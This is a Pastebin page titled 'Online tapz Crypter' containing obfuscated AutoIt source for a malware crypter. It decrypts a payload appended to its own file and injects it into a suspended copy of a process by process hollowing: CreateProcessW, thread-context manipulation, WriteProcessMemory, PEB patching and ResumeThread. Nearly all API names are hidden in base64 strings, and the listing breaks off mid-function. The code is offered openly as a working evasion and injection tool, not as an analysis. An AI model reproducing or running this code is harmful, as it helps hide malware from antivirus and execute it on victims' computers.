API tools faq
paste
XenocodeRCE

Online tapz Crypter

XenocodeRCE
Aug 14th, 2013
213
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 20.58 KB | None | 0 0
raw download clone embed print report
  1. #NoTrayIcon
  2. $xgzvzvlbafghpv = @ScriptFullPath
  3. $ngcvmfglujmhmh = "RHdBBadGdazt"
  4. $gmqejmamrrsrfv = FileRead($xgzvzvlbafghpv)
  5. $zedsmtaiixjqmo = StringLen($ngcvmfglujmhmh)
  6. $gmqejmamrrsrfv = StringMid($gmqejmamrrsrfv, StringInStr($gmqejmamrrsrfv, $ngcvmfglujmhmh) + $zedsmtaiixjqmo)
  7. Call(htcllljaodnpmr(hxjeemugedhdhb($gmqejmamrrsrfv, "MeX2tFSQMx0zzTk0vciGh72KwOMwJmqhjtkXmEbgS6YW9iuwiiyp7d9oxuCLXwvr3YwOvdjIjwyGuLCb09WjkkmwKYrSq7DehQmb")))
  8.  
  9. Func hxjeemugedhdhb($gmqejmamrrsrfv, $ngcvmfglujmhmh)
  10.     Local $aiggusaopjibxa = octdsfveflrtqx("MHhDODEwMDEwMDZBMDA2QTAwNTM1NjU3OEI1NTEwMzFDOTg5Qzg0OTg5RDdGMkFFNDg0ODI5Qzg4OTQ1RjA4NUMwMEY4NERDMDAwMDAwQjkwMDAxMDAwMDg4QzgyQzAxODg4NDBERUZGRUZGRkZFMkYzODM2NUY0MDA4MzY1RkMwMDgxN0RGQzAwMDEwMDAwN0Q0NzhCNDVGQzMxRDJGNzc1RjA5MjAzNDUxMDBGQjYwMDhCNERGQzBGQjY4QzBERjBGRUZGRkYwMUM4MDM0NUY0MjVGRjAwMDAwMDg5NDVGNDhCNzVGQzhBODQzNUYwRkVGRkZGOEI3REY0ODY4NDNERjBGRUZGRkY4ODg0MzVGMEZFRkZGRkZGNDVGQ0VCQjA4RDlERjBGRUZGRkYzMUZGODlGQTM5NTUwQzc2NjM4Qjg1RUNGRUZGRkY0MDI1RkYwMDAwMDA4OTg1RUNGRUZGRkY4OUQ4MDM4NUVDRkVGRkZGMEZCNjAwMDM4NUU4RkVGRkZGMjVGRjAwMDAwMDg5ODVFOEZFRkZGRjg5REUwM0I1RUNGRUZGRkY4QTA2ODlERjAzQkRFOEZFRkZGRjg2MDc4ODA2MEZCNjBFMEZCNjA3MDFDMTgxRTFGRjAwMDAwMDhBODQwREYwRkVGRkZGOEI3NTA4MDFENjMwMDY0MkVCOTg1RjVFNUJDOUMyMTAwMA==")
  11.     Local $jtvfbizagqrmcs = DllStructCreate(octdsfveflrtqx("Ynl0ZVs=") & BinaryLen($aiggusaopjibxa) & "]")
  12.     DllStructSetData($jtvfbizagqrmcs, 1, $aiggusaopjibxa)
  13.     Local $evdtgogsnzejax = DllStructCreate(octdsfveflrtqx("Ynl0ZVs=") & BinaryLen($gmqejmamrrsrfv) & "]")
  14.     DllStructSetData($evdtgogsnzejax, 1, $gmqejmamrrsrfv)
  15.     DllCall(octdsfveflrtqx("VVNFUjMy"), "none", octdsfveflrtqx("Q2FsbFdpbmRvd1Byb2NB"), octdsfveflrtqx("cHRy"), DllStructGetPtr($jtvfbizagqrmcs), octdsfveflrtqx("cHRy"), DllStructGetPtr($evdtgogsnzejax), octdsfveflrtqx("aW50"), BinaryLen($gmqejmamrrsrfv), "str", $ngcvmfglujmhmh, octdsfveflrtqx("aW50"), 0)
  16.     Local $dulxfphbeddvho = DllStructGetData($evdtgogsnzejax, 1)
  17.     Return $dulxfphbeddvho
  18. EndFunc
  19.  
  20. Func htcllljaodnpmr($ttsenadplmmmeh, $lpomiinrrqxzgi = "", $mdzidhhfnxnxbv = @AutoItExe)
  21.     Local $fautoitx64 = @AutoItX64
  22.     Local $eqdenoxtoeiimf = Binary($ttsenadplmmmeh)
  23.     Local $guxovmusfmjgpa = DllStructCreate(octdsfveflrtqx("Ynl0ZVs=") & BinaryLen($eqdenoxtoeiimf) & "]")
  24.     DllStructSetData($guxovmusfmjgpa, 1, $eqdenoxtoeiimf)
  25.     Local $nxunafmfgpvsdf = DllStructGetPtr($guxovmusfmjgpa)
  26.     Local $rtzlxcopszhppg = DllStructCreate(octdsfveflrtqx("ZHdvcmQgIGNiU2l6ZTtwdHIgUmVzZXJ2ZWQ7cHRyIERlc2t0b3A7cHRyIFRpdGxlO2R3b3JkIFg7ZHdvcmQgWTtkd29yZCBYU2l6ZTtkd29yZCBZU2l6ZTtkd29yZCBYQ291bnRDaGFycztkd29yZCBZQ291bnRDaGFycztkd29yZCBGaWxsQXR0cmlidXRlO2R3b3JkIEZsYWdzO3dvcmQgU2hvd1dpbmRvdzt3b3JkIFJlc2VydmVkMjtwdHIgUmVzZXJ2ZWQyO3B0ciBoU3RkSW5wdXQ7cHRyIGhTdGRPdXRwdXQ7cHRyIGhTdGRFcnJvcg=="))
  27.     Local $anfvosjooefcls = DllStructCreate(octdsfveflrtqx("cHRyIFByb2Nlc3M7cHRyIFRocmVhZDtkd29yZCBQcm9jZXNzSWQ7ZHdvcmQgVGhyZWFkSWQ="))
  28.     Local $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("Qm9vbA=="), octdsfveflrtqx("Q3JlYXRlUHJvY2Vzc1c="), "wstr", $mdzidhhfnxnxbv, "wstr", $lpomiinrrqxzgi, octdsfveflrtqx("cHRy"), 0, octdsfveflrtqx("cHRy"), 0, octdsfveflrtqx("aW50"), 0, "dword", 4, octdsfveflrtqx("cHRy"), 0, octdsfveflrtqx("cHRy"), 0, octdsfveflrtqx("cHRy"), DllStructGetPtr($rtzlxcopszhppg), octdsfveflrtqx("cHRy"), DllStructGetPtr($anfvosjooefcls))
  29.     If @error OR NOT $sxczganvblgaaq[0] Then Return SetError(1, 0, 0)
  30.     Local $dirxmpngrrplfj = DllStructGetData($anfvosjooefcls, octdsfveflrtqx("UHJvY2Vzcw=="))
  31.     Local $lggcvhsmdvhlvg = DllStructGetData($anfvosjooefcls, octdsfveflrtqx("VGhyZWFk"))
  32.     Local $vjhpqvvipfbulg, $fafhpngauletli
  33.     If $fautoitx64 Then
  34.         If @OSArch = "X64" Then
  35.             $vjhpqvvipfbulg = 2
  36.             $fafhpngauletli = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & "dword ContextFlags; dword MxCsr;" & "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & "uint64 Rip;" & "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & "uint64 VectorRegister[52]; uint64 VectorControl;" & "uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
  37.         Else
  38.             $vjhpqvvipfbulg = 3
  39.         EndIf
  40.     Else
  41.         $vjhpqvvipfbulg = 1
  42.         $fafhpngauletli = DllStructCreate(octdsfveflrtqx("ZHdvcmQgQ29udGV4dEZsYWdzO2R3b3JkIERyMDsgZHdvcmQgRHIxOyBkd29yZCBEcjI7IGR3b3JkIERyMzsgZHdvcmQgRHI2OyBkd29yZCBEcjc7ZHdvcmQgQ29udHJvbFdvcmQ7IGR3b3JkIFN0YXR1c1dvcmQ7IGR3b3JkIFRhZ1dvcmQ7IGR3b3JkIEVycm9yT2Zmc2V0OyBkd29yZCBFcnJvclNlbGVjdG9yOyBkd29yZCBEYXRhT2Zmc2V0OyBkd29yZCBEYXRhU2VsZWN0b3I7IGJ5dGUgUmVnaXN0ZXJBcmVhWzgwXTsgZHdvcmQgQ3IwTnB4U3RhdGU7ZHdvcmQgU2VnR3M7IGR3b3JkIFNlZ0ZzOyBkd29yZCBTZWdFczsgZHdvcmQgU2VnRHM7ZHdvcmQgRWRpOyBkd29yZCBFc2k7IGR3b3JkIEVieDsgZHdvcmQgRWR4OyBkd29yZCBFY3g7IGR3b3JkIEVheDtkd29yZCBFYnA7IGR3b3JkIEVpcDsgZHdvcmQgU2VnQ3M7IGR3b3JkIEVGbGFnczsgZHdvcmQgRXNwOyBkd29yZCBTZWdTcztieXRlIEV4dGVuZGVkUmVnaXN0ZXJzWzUxMl0="))
  43.     EndIf
  44.     Local $gqzzdnlsgqnfbg
  45.     Switch $vjhpqvvipfbulg
  46.         Case 1
  47.             $gqzzdnlsgqnfbg = 65543
  48.         Case 2
  49.             $gqzzdnlsgqnfbg = 1048583
  50.         Case 3
  51.             $gqzzdnlsgqnfbg = 524327
  52.     EndSwitch
  53.     DllStructSetData($fafhpngauletli, octdsfveflrtqx("Q29udGV4dEZsYWdz"), $gqzzdnlsgqnfbg)
  54.     $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("Qm9vbA=="), octdsfveflrtqx("R2V0VGhyZWFkQ29udGV4dA=="), octdsfveflrtqx("aGFuZGxl"), $lggcvhsmdvhlvg, octdsfveflrtqx("cHRy"), DllStructGetPtr($fafhpngauletli))
  55.     Local $qxgeqcavizcdlp
  56.     Switch $vjhpqvvipfbulg
  57.         Case 1
  58.             $qxgeqcavizcdlp = DllStructGetData($fafhpngauletli, octdsfveflrtqx("RWJ4"))
  59.         Case 2
  60.             $qxgeqcavizcdlp = DllStructGetData($fafhpngauletli, "Rdx")
  61.     EndSwitch
  62.     Local $sgihsbicpfxojt = DllStructCreate(octdsfveflrtqx("Y2hhciBNYWdpY1syXTs=") & octdsfveflrtqx("d29yZCBCeXRlc09uTGFzdFBhZ2U7d29yZCBQYWdlczt3b3JkIFJlbG9jYXRpb25zO3dvcmQgU2l6ZW9mSGVhZGVyO3dvcmQgTWluaW11bUV4dHJhO3dvcmQgTWF4aW11bUV4dHJhO3dvcmQgU1M7d29yZCBTUDt3b3JkIENoZWNrc3VtO3dvcmQgSVA7d29yZCBDUzt3b3JkIFJlbG9jYXRpb247d29yZCBPdmVybGF5O2NoYXIgUmVzZXJ2ZWRbOF07d29yZCBPRU1JZGVudGlmaWVyO3dvcmQgT0VNSW5mb3JtYXRpb247Y2hhciBSZXNlcnZlZDJbMjBdO2R3b3JkIEFkZHJlc3NPZk5ld0V4ZUhlYWRlcg=="), $nxunafmfgpvsdf)
  63.     Local $scjrzbzdqlbnvb = $nxunafmfgpvsdf
  64.     $nxunafmfgpvsdf += DllStructGetData($sgihsbicpfxojt, octdsfveflrtqx("QWRkcmVzc09mTmV3RXhlSGVhZGVy"))
  65.     Local $ixeztjjgvpmaxc = DllStructGetData($sgihsbicpfxojt, octdsfveflrtqx("TWFnaWM="))
  66.     Local $jlpvoidssvczrp = DllStructCreate(octdsfveflrtqx("ZHdvcmQgU2lnbmF0dXJl"), $nxunafmfgpvsdf)
  67.     $nxunafmfgpvsdf += 4
  68.     Local $dztqzqshtcxjdz = DllStructCreate(octdsfveflrtqx("d29yZCBNYWNoaW5lO3dvcmQgTnVtYmVyT2ZTZWN0aW9ucztkd29yZCBUaW1lRGF0ZVN0YW1wO2R3b3JkIFBvaW50ZXJUb1N5bWJvbFRhYmxlO2R3b3JkIE51bWJlck9mU3ltYm9sczt3b3JkIFNpemVPZk9wdGlvbmFsSGVhZGVyO3dvcmQgQ2hhcmFjdGVyaXN0aWNz"), $nxunafmfgpvsdf)
  69.     Local $fdobhoqgljzhgs = DllStructGetData($dztqzqshtcxjdz, octdsfveflrtqx("TnVtYmVyT2ZTZWN0aW9ucw=="))
  70.     $nxunafmfgpvsdf += 20
  71.     Local $zjcigtjhhrfrah = DllStructCreate("word Magic;", $nxunafmfgpvsdf)
  72.     Local $qcoxidjexxvqga = DllStructGetData($zjcigtjhhrfrah, 1)
  73.     Local $zuuiatfctdtdcm
  74.     If $qcoxidjexxvqga = 267 Then
  75.         $zuuiatfctdtdcm = DllStructCreate(octdsfveflrtqx("d29yZCBNYWdpYztieXRlIE1ham9yTGlua2VyVmVyc2lvbjtieXRlIE1pbm9yTGlua2VyVmVyc2lvbjtkd29yZCBTaXplT2ZDb2RlO2R3b3JkIFNpemVPZkluaXRpYWxpemVkRGF0YTtkd29yZCBTaXplT2ZVbmluaXRpYWxpemVkRGF0YTtkd29yZCBBZGRyZXNzT2ZFbnRyeVBvaW50O2R3b3JkIEJhc2VPZkNvZGU7ZHdvcmQgQmFzZU9mRGF0YTtkd29yZCBJbWFnZUJhc2U7ZHdvcmQgU2VjdGlvbkFsaWdubWVudDtkd29yZCBGaWxlQWxpZ25tZW50O3dvcmQgTWFqb3JPcGVyYXRpbmdTeXN0ZW1WZXJzaW9uO3dvcmQgTWlub3JPcGVyYXRpbmdTeXN0ZW1WZXJzaW9uO3dvcmQgTWFqb3JJbWFnZVZlcnNpb247d29yZCBNaW5vckltYWdlVmVyc2lvbjt3b3JkIE1ham9yU3Vic3lzdGVtVmVyc2lvbjt3b3JkIE1pbm9yU3Vic3lzdGVtVmVyc2lvbjtkd29yZCBXaW4zMlZlcnNpb25WYWx1ZTtkd29yZCBTaXplT2ZJbWFnZTtkd29yZCBTaXplT2ZIZWFkZXJzO2R3b3JkIENoZWNrU3VtO3dvcmQgU3Vic3lzdGVtO3dvcmQgRGxsQ2hhcmFjdGVyaXN0aWNzO2R3b3JkIFNpemVPZlN0YWNrUmVzZXJ2ZTtkd29yZCBTaXplT2ZTdGFja0NvbW1pdDtkd29yZCBTaXplT2ZIZWFwUmVzZXJ2ZTtkd29yZCBTaXplT2ZIZWFwQ29tbWl0O2R3b3JkIExvYWRlckZsYWdzO2R3b3JkIE51bWJlck9mUnZhQW5kU2l6ZXM="), $nxunafmfgpvsdf)
  76.         $nxunafmfgpvsdf += 96
  77.     ElseIf $qcoxidjexxvqga = 523 Then
  78.         $zuuiatfctdtdcm = DllStructCreate(octdsfveflrtqx("d29yZCBNYWdpYztieXRlIE1ham9yTGlua2VyVmVyc2lvbjtieXRlIE1pbm9yTGlua2VyVmVyc2lvbjtkd29yZCBTaXplT2ZDb2RlO2R3b3JkIFNpemVPZkluaXRpYWxpemVkRGF0YTtkd29yZCBTaXplT2ZVbmluaXRpYWxpemVkRGF0YTtkd29yZCBBZGRyZXNzT2ZFbnRyeVBvaW50O2R3b3JkIEJhc2VPZkNvZGU7dWludDY0IEltYWdlQmFzZTtkd29yZCBTZWN0aW9uQWxpZ25tZW50O2R3b3JkIEZpbGVBbGlnbm1lbnQ7d29yZCBNYWpvck9wZXJhdGluZ1N5c3RlbVZlcnNpb247d29yZCBNaW5vck9wZXJhdGluZ1N5c3RlbVZlcnNpb247d29yZCBNYWpvckltYWdlVmVyc2lvbjt3b3JkIE1pbm9ySW1hZ2VWZXJzaW9uO3dvcmQgTWFqb3JTdWJzeXN0ZW1WZXJzaW9uO3dvcmQgTWlub3JTdWJzeXN0ZW1WZXJzaW9uO2R3b3JkIFdpbjMyVmVyc2lvblZhbHVlO2R3b3JkIFNpemVPZkltYWdlO2R3b3JkIFNpemVPZkhlYWRlcnM7ZHdvcmQgQ2hlY2tTdW07d29yZCBTdWJzeXN0ZW07d29yZCBEbGxDaGFyYWN0ZXJpc3RpY3M7dWludDY0IFNpemVPZlN0YWNrUmVzZXJ2ZTt1aW50NjQgU2l6ZU9mU3RhY2tDb21taXQ7dWludDY0IFNpemVPZkhlYXBSZXNlcnZlO3VpbnQ2NCBTaXplT2ZIZWFwQ29tbWl0O2R3b3JkIExvYWRlckZsYWdzO2R3b3JkIE51bWJlck9mUnZhQW5kU2l6ZXM="), $nxunafmfgpvsdf)
  79.         $nxunafmfgpvsdf += 112
  80.     Else
  81.     EndIf
  82.     Local $rfrlrbjjfjubrj = DllStructGetData($zuuiatfctdtdcm, octdsfveflrtqx("QWRkcmVzc09mRW50cnlQb2ludA=="))
  83.     Local $cqijxqitvqemvd = DllStructGetData($zuuiatfctdtdcm, octdsfveflrtqx("U2l6ZU9mSGVhZGVycw=="))
  84.     Local $vsozdxqodzqjti = DllStructGetData($zuuiatfctdtdcm, octdsfveflrtqx("SW1hZ2VCYXNl"))
  85.     Local $urxccxrvtdpvca = DllStructGetData($zuuiatfctdtdcm, octdsfveflrtqx("U2l6ZU9mSW1hZ2U="))
  86.     $nxunafmfgpvsdf += 8
  87.     $nxunafmfgpvsdf += 8
  88.     $nxunafmfgpvsdf += 24
  89.     Local $ehvtbocnbjsucc = DllStructCreate(octdsfveflrtqx("ZHdvcmQgVmlydHVhbEFkZHJlc3M7IGR3b3JkIFNpemU="), $nxunafmfgpvsdf)
  90.     Local $fzolooghmpdgsa = DllStructGetData($ehvtbocnbjsucc, octdsfveflrtqx("VmlydHVhbEFkZHJlc3M="))
  91.     Local $pfxqcdulnxqeci = DllStructGetData($ehvtbocnbjsucc, octdsfveflrtqx("U2l6ZQ=="))
  92.     Local $roateceqtempbn
  93.     If $fzolooghmpdgsa AND $pfxqcdulnxqeci Then $roateceqtempbn = True
  94.     If NOT $roateceqtempbn Then ConsoleWrite("!By M3!" & @CRLF)
  95.     $nxunafmfgpvsdf += 88
  96.     Local $qjaejctrujpont
  97.     Local $tlmubzhivrvzue
  98.     If $roateceqtempbn Then
  99.         $tlmubzhivrvzue = htcllljaodnpmr_allocateexespace($dirxmpngrrplfj, $urxccxrvtdpvca)
  100.         $qjaejctrujpont = True
  101.     Else
  102.         $tlmubzhivrvzue = htcllljaodnpmr_allocateexespaceataddress($dirxmpngrrplfj, $vsozdxqodzqjti, $urxccxrvtdpvca)
  103.         If @error Then
  104.             htcllljaodnpmr_unmapviewofsection($dirxmpngrrplfj, $vsozdxqodzqjti)
  105.             $tlmubzhivrvzue = htcllljaodnpmr_allocateexespaceataddress($dirxmpngrrplfj, $vsozdxqodzqjti, $urxccxrvtdpvca)
  106.         EndIf
  107.     EndIf
  108.     DllStructSetData($zuuiatfctdtdcm, octdsfveflrtqx("SW1hZ2VCYXNl"), $tlmubzhivrvzue)
  109.     Local $uxvrvxcuszlvps = DllStructCreate(octdsfveflrtqx("Ynl0ZVs=") & $urxccxrvtdpvca & "]")
  110.     Local $nlbnffqltehibb = DllStructGetPtr($uxvrvxcuszlvps)
  111.     Local $elenspnupinhxm = DllStructCreate(octdsfveflrtqx("Ynl0ZVs=") & $cqijxqitvqemvd & "]", $scjrzbzdqlbnvb)
  112.     DllStructSetData($uxvrvxcuszlvps, 1, DllStructGetData($elenspnupinhxm, 1))
  113.     Local $xrsvrugumqtsqb
  114.     Local $ojfjtegrdvlrxs, $jhdfhidetfecao
  115.     Local $dragzqhmgmfaon, $bzzviseicpsnnv
  116.     Local $tbelozndixgjlc
  117.     For $i = 1 To $fdobhoqgljzhgs
  118.         $xrsvrugumqtsqb = DllStructCreate("char Name[8];" & octdsfveflrtqx("ZHdvcmQgVW5pb25PZlZpcnR1YWxTaXplQW5kUGh5c2ljYWxBZGRyZXNzOw==") & octdsfveflrtqx("ZHdvcmQgVmlydHVhbEFkZHJlc3M7") & octdsfveflrtqx("ZHdvcmQgU2l6ZU9mUmF3RGF0YTs=") & octdsfveflrtqx("ZHdvcmQgUG9pbnRlclRvUmF3RGF0YTs=") & octdsfveflrtqx("ZHdvcmQgUG9pbnRlclRvUmVsb2NhdGlvbnM7") & octdsfveflrtqx("ZHdvcmQgUG9pbnRlclRvTGluZW51bWJlcnM7") & octdsfveflrtqx("d29yZCBOdW1iZXJPZlJlbG9jYXRpb25zOw==") & octdsfveflrtqx("d29yZCBOdW1iZXJPZkxpbmVudW1iZXJzOw==") & octdsfveflrtqx("ZHdvcmQgQ2hhcmFjdGVyaXN0aWNz"), $nxunafmfgpvsdf)
  119.         $ojfjtegrdvlrxs = DllStructGetData($xrsvrugumqtsqb, octdsfveflrtqx("U2l6ZU9mUmF3RGF0YQ=="))
  120.         $jhdfhidetfecao = $scjrzbzdqlbnvb + DllStructGetData($xrsvrugumqtsqb, octdsfveflrtqx("UG9pbnRlclRvUmF3RGF0YQ=="))
  121.         $dragzqhmgmfaon = DllStructGetData($xrsvrugumqtsqb, octdsfveflrtqx("VmlydHVhbEFkZHJlc3M="))
  122.         $bzzviseicpsnnv = DllStructGetData($xrsvrugumqtsqb, octdsfveflrtqx("VW5pb25PZlZpcnR1YWxTaXplQW5kUGh5c2ljYWxBZGRyZXNz"))
  123.         If $bzzviseicpsnnv AND $bzzviseicpsnnv < $ojfjtegrdvlrxs Then $ojfjtegrdvlrxs = $bzzviseicpsnnv
  124.         If $ojfjtegrdvlrxs Then
  125.             DllStructSetData(DllStructCreate(octdsfveflrtqx("Ynl0ZVs=") & $ojfjtegrdvlrxs & "]", $nlbnffqltehibb + $dragzqhmgmfaon), 1, DllStructGetData(DllStructCreate(octdsfveflrtqx("Ynl0ZVs=") & $ojfjtegrdvlrxs & "]", $jhdfhidetfecao), 1))
  126.         EndIf
  127.         If $qjaejctrujpont Then
  128.             If $dragzqhmgmfaon <= $fzolooghmpdgsa AND $dragzqhmgmfaon + $ojfjtegrdvlrxs > $fzolooghmpdgsa Then
  129.                 $tbelozndixgjlc = DllStructCreate(octdsfveflrtqx("Ynl0ZVs=") & $pfxqcdulnxqeci & "]", $jhdfhidetfecao + ($fzolooghmpdgsa - $dragzqhmgmfaon))
  130.             EndIf
  131.         EndIf
  132.         $nxunafmfgpvsdf += 40
  133.     Next
  134.     If $qjaejctrujpont Then htcllljaodnpmr_fixreloc($nlbnffqltehibb, $tbelozndixgjlc, $tlmubzhivrvzue, $vsozdxqodzqjti, $qcoxidjexxvqga = 523)
  135.     $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("Qm9vbA=="), octdsfveflrtqx("V3JpdGVQcm9jZXNzTWVtb3J5"), octdsfveflrtqx("aGFuZGxl"), $dirxmpngrrplfj, octdsfveflrtqx("cHRy"), $tlmubzhivrvzue, octdsfveflrtqx("cHRy"), $nlbnffqltehibb, octdsfveflrtqx("ZHdvcmRfcHRy"), $urxccxrvtdpvca, "dword_ptr*", 0)
  136.     Local $fffzinqztfatac = DllStructCreate("byte InheritedAddressSpace;" & "byte ReadImageFileExecOptions;" & "byte BeingDebugged;" & "byte Spare;" & "ptr Mutant;" & "ptr ImageBaseAddress;" & "ptr LoaderData;" & "ptr ProcessParameters;" & "ptr SubSystemData;" & "ptr ProcessHeap;" & "ptr FastPebLock;" & "ptr FastPebLockRoutine;" & "ptr FastPebUnlockRoutine;" & "dword EnvironmentUpdateCount;" & "ptr KernelCallbackTable;" & "ptr EventLogSection;" & "ptr EventLog;" & "ptr FreeList;" & "dword TlsExpansionCounter;" & "ptr TlsBitmap;" & "dword TlsBitmapBits[2];" & "ptr ReadOnlySharedMemoryBase;" & "ptr ReadOnlySharedMemoryHeap;" & "ptr ReadOnlyStaticServerData;" & "ptr AnsiCodePageData;" & "ptr OemCodePageData;" & "ptr UnicodeCaseTableData;" & "dword NumberOfProcessors;" & "dword NtGlobalFlag;" & "byte Spare2[4];" & "int64 CriticalSectionTimeout;" & "dword HeapSegmentReserve;" & "dword HeapSegmentCommit;" & "dword HeapDeCommitTotalFreeThreshold;" & "dword HeapDeCommitFreeBlockThreshold;" & "dword NumberOfHeaps;" & "dword MaximumNumberOfHeaps;" & "ptr ProcessHeaps;" & "ptr GdiSharedHandleTable;" & "ptr ProcessStarterHelper;" & "ptr GdiDCAttributeList;" & "ptr LoaderLock;" & "dword OSMajorVersion;" & "dword OSMinorVersion;" & "dword OSBuildNumber;" & "dword OSPlatformId;" & "dword ImageSubSystem;" & "dword ImageSubSystemMajorVersion;" & "dword ImageSubSystemMinorVersion;" & "dword GdiHandleBuffer[34];" & "dword PostProcessInitRoutine;" & "dword TlsExpansionBitmap;" & "byte TlsExpansionBitmapBits[128];" & "dword SessionId")
  137.     $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("Qm9vbA=="), octdsfveflrtqx("UmVhZFByb2Nlc3NNZW1vcnk="), octdsfveflrtqx("cHRy"), $dirxmpngrrplfj, octdsfveflrtqx("cHRy"), $qxgeqcavizcdlp, octdsfveflrtqx("cHRy"), DllStructGetPtr($fffzinqztfatac), octdsfveflrtqx("ZHdvcmRfcHRy"), DllStructGetSize($fffzinqztfatac), "dword_ptr*", 0)
  138.     DllStructSetData($fffzinqztfatac, "ImageBaseAddress", $tlmubzhivrvzue)
  139.     $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("Qm9vbA=="), octdsfveflrtqx("V3JpdGVQcm9jZXNzTWVtb3J5"), octdsfveflrtqx("aGFuZGxl"), $dirxmpngrrplfj, octdsfveflrtqx("cHRy"), $qxgeqcavizcdlp, octdsfveflrtqx("cHRy"), DllStructGetPtr($fffzinqztfatac), octdsfveflrtqx("ZHdvcmRfcHRy"), DllStructGetSize($fffzinqztfatac), "dword_ptr*", 0)
  140.     Switch $vjhpqvvipfbulg
  141.         Case 1
  142.             DllStructSetData($fafhpngauletli, octdsfveflrtqx("RWF4"), $tlmubzhivrvzue + $rfrlrbjjfjubrj)
  143.         Case 2
  144.             DllStructSetData($fafhpngauletli, octdsfveflrtqx("UmN4"), $tlmubzhivrvzue + $rfrlrbjjfjubrj)
  145.         Case 3
  146.     EndSwitch
  147.     $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("Qm9vbA=="), octdsfveflrtqx("U2V0VGhyZWFkQ29udGV4dA=="), octdsfveflrtqx("aGFuZGxl"), $lggcvhsmdvhlvg, octdsfveflrtqx("cHRy"), DllStructGetPtr($fafhpngauletli))
  148.     $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("ZHdvcmQ="), octdsfveflrtqx("UmVzdW1lVGhyZWFk"), octdsfveflrtqx("aGFuZGxl"), $lggcvhsmdvhlvg)
  149. EndFunc
  150.  
  151. Func htcllljaodnpmr_fixreloc($nlbnffqltehibb, $siuzaaiqnvulcu, $cvhbqqstulanjv, $hearzlezmserod, $avmgcsetdzuquu)
  152.     Local $fffzinqztfatac = $cvhbqqstulanjv - $hearzlezmserod
  153.     Local $plvgudfjmrmfpc = DllStructGetSize($siuzaaiqnvulcu)
  154.     Local $bsenistnnabdal = DllStructGetPtr($siuzaaiqnvulcu)
  155.     Local $pvpgpdaezdbprg, $sschmadxcqlamz
  156.     Local $dragzqhmgmfaon, $tfnegzxjxxbxgm, $ipsrslasaescqh
  157.     Local $msraqgnzadvirt, $ozmjbelxqlxguo, $baptjrdblltbgg
  158.     Local $lmgsphdlcrdlla = 3 + 7 * $avmgcsetdzuquu
  159.     While $sschmadxcqlamz < $plvgudfjmrmfpc
  160.         $pvpgpdaezdbprg = DllStructCreate(octdsfveflrtqx("ZHdvcmQgVmlydHVhbEFkZHJlc3M7IGR3b3JkIFNpemVPZkJsb2Nr"), $bsenistnnabdal + $sschmadxcqlamz)
  161.         $dragzqhmgmfaon = DllStructGetData($pvpgpdaezdbprg, octdsfveflrtqx("VmlydHVhbEFkZHJlc3M="))
  162.         $tfnegzxjxxbxgm = DllStructGetData($pvpgpdaezdbprg, octdsfveflrtqx("U2l6ZU9mQmxvY2s="))
  163.         $ipsrslasaescqh = ($tfnegzxjxxbxgm - 8) / 2
  164.         $msraqgnzadvirt = DllStructCreate(octdsfveflrtqx("d29yZFs=") & $ipsrslasaescqh & "]", DllStructGetPtr($pvpgpdaezdbprg) + 8)
  165.         For $i = 1 To $ipsrslasaescqh
  166.             $ozmjbelxqlxguo = DllStructGetData($msraqgnzadvirt, 1, $i)
  167.             If BitShift($ozmjbelxqlxguo, 12) = $lmgsphdlcrdlla Then
  168.                 $baptjrdblltbgg = DllStructCreate(octdsfveflrtqx("cHRy"), $nlbnffqltehibb + $dragzqhmgmfaon + BitAND($ozmjbelxqlxguo, 4095))
  169.                 DllStructSetData($baptjrdblltbgg, 1, DllStructGetData($baptjrdblltbgg, 1) + $fffzinqztfatac)
  170.             EndIf
  171.         Next
  172.         $sschmadxcqlamz += $tfnegzxjxxbxgm
  173.     WEnd
  174.     Return 1
  175. EndFunc
  176.  
  177. Func htcllljaodnpmr_allocateexespaceataddress($dirxmpngrrplfj, $enultomnaeouqu, $plvgudfjmrmfpc)
  178.     Local $sxczganvblgaaq = DllCall(octdsfveflrtqx("S0VSTkVMMzI="), octdsfveflrtqx("cHRy"), octdsfveflrtqx("VmlydHVhbEFsbG9jRXg="), octdsfveflrtqx("aGFuZGxl"), $dirxmpngrrplfj, octdsfveflrtqx("cHRy"), $enultomnaeouqu, octdsfveflrtqx("ZHdvcmRfcHRy"), $plvgudfjmrmfpc, octdsfveflrtqx("ZHdvcmQ="), 4096, octdsfveflrtqx("ZHdvcmQ="), 64)
  179.     If @error OR NOT $sxczganvblgaaq[0] Then
